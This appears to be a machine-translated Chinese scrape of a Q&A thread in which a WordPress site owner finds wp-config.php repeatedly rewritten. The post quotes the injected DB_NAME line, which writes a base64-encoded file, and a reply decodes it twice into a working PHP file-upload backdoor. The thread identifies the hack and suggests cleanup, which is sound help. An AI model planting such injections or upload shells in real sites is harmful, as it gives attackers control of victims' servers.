wp-config.php不断更改数据库名称、用户名和密码
我正在使用WordPress和一个名为WP Rocket的插件来优化我的网站。从两天前开始,wp-config.php文件不断地将数据库名称更改为下面的代码wp-config.php不断更改数据库名称、用户名和密码,php,wordpress,Php,Wordpress,我正在使用WordPress和一个名为WP Rocket的插件来优化我的网站。从两天前开始,wp-config.php文件不断地将数据库名称更改为下面的代码 **Original DB name was define('DB_NAME', 'db1');** 但是改成 **define('DB_NAME', 'wordpress\'); file_put_contents(\"wp-upload-class.php\", base64_decode(**\'PD9waHANCmVjaG8gIl
**Original DB name was define('DB_NAME', 'db1');**
但是改成
**define('DB_NAME', 'wordpress\'); file_put_contents(\"wp-upload-class.php\", base64_decode(**\'PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKGlzc2V0KCRfRk
lMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNNYi
kiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW
5hbWUiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWy
JmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2
hvICgiPGJyPkRvbmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi
4kcGhwX2Vycm9ybXNnLiI8YnI+Iik7DQogICB9DQp9DQo/Pg==\')); /*');</i>
用户名和密码也更改为“用户”和“密码”,如下所示
/** MySQL database username */
define('DB_USER', 'user');
/** MySQL database password */
define('DB_PASSWORD', 'password');</i>
这是一个安全问题。插件正在更改您的配置以打开后门
我发现这篇文章可以帮助您:这是一个安全问题。插件正在更改您的配置以打开后门
我发现那篇文章可以帮助你:我想你的网站被黑了。如果您解码代码,您将得到:
<?php
echo "This shit works!";
if (isset($_FILES["filename"]))
{
if($_FILES["filename"]["size"] > 1024*3*1024)
{
echo ("File too large (more than 3Mb)");
exit;
}
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
echo ("<br>Done!<br>");
} else {
echo("<br>Error! ".$php_errormsg."<br>");
}
}
?>
代码只是一条关于上传文件大小的消息,但我认为这是更多被黑客攻击的base64文件部分的一部分
因此,现在您有两种选择:
我要雇人
2或者您可以逐步浏览互联网上的指南:
这是您第一次可以在wp.org上查看
提示:如果一个网站被黑客攻击,你应该首先让它不被访问者访问,这样没有人会被感染。我想你的网站被黑客攻击了。如果您解码代码,您将得到:
<?php
echo "This shit works!";
if (isset($_FILES["filename"]))
{
if($_FILES["filename"]["size"] > 1024*3*1024)
{
echo ("File too large (more than 3Mb)");
exit;
}
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
echo ("<br>Done!<br>");
} else {
echo("<br>Error! ".$php_errormsg."<br>");
}
}
?>
代码只是一条关于上传文件大小的消息,但我认为这是更多被黑客攻击的base64文件部分的一部分
因此,现在您有两种选择:
我要雇人
2或者您可以逐步浏览互联网上的指南:
这是您第一次可以在wp.org上查看
提示:如果一个网站被黑客攻击,你应该首先让它不被访问者访问,这样就不会有人被感染